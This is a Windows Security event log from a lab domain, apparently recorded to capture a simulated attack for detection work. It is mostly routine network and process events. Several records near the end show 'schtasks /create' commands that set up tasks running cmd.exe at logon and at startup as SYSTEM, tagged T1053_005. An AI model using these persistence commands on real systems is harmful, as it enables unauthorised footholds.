EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278891
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63546
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278890
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63546
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278889
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887268
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63963
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887267
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53233
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887266
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 63546
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887265
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4148
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1276
Destination Address: 10.0.1.12
Destination Port: 8089
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887264
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4148
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1276
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887263
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1275
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887262
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1275
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887270
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x15b8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887269
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278905
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53918
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278904
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53917
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278903
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53916
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278902
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53915
Destination Address: 52.247.37.26
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278901
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 50088
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278900
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50088
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278899
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50088
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278898
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53914
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278897
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 61629
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278896
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61629
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278895
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61629
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887274
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xd8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Exit Status: 0x1
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887273
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 50088
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887272
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887271
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 61629
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278924
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xfa4
Process Name: C:\Windows\System32\cmd.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278923
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1e68
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278922
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \T1053_005_OnStartup
Task Content:
2021-04-19T18:27:52
WIN-HOST-5\Administrator
\T1053_005_OnStartup
2021-04-19T18:27:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
cmd.exe
/c calc.exe
S-1-5-18
LeastPrivilege
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278921
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1e68
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xfa4
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278920
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x175c
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278919
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \T1053_005_OnLogon
Task Content:
2021-04-19T18:27:52
WIN-HOST-5\Administrator
\T1053_005_OnLogon
2021-04-19T18:27:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
cmd.exe
/c calc.exe
WIN-HOST-5\Administrator
InteractiveToken
LeastPrivilege
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278918
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x175c
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xfa4
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278917
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfa4
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /c "schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" & schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe""
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278916
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53446
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278915
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 53446
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278914
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 53446
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278913
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1d0c
Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278912
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xd60
Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278911
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd60
New Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x1d0c
Creator Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Process Command Line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES531A.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\qupsc0xs\CSC166760C2EA504DE3806803781F21433.TMP"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
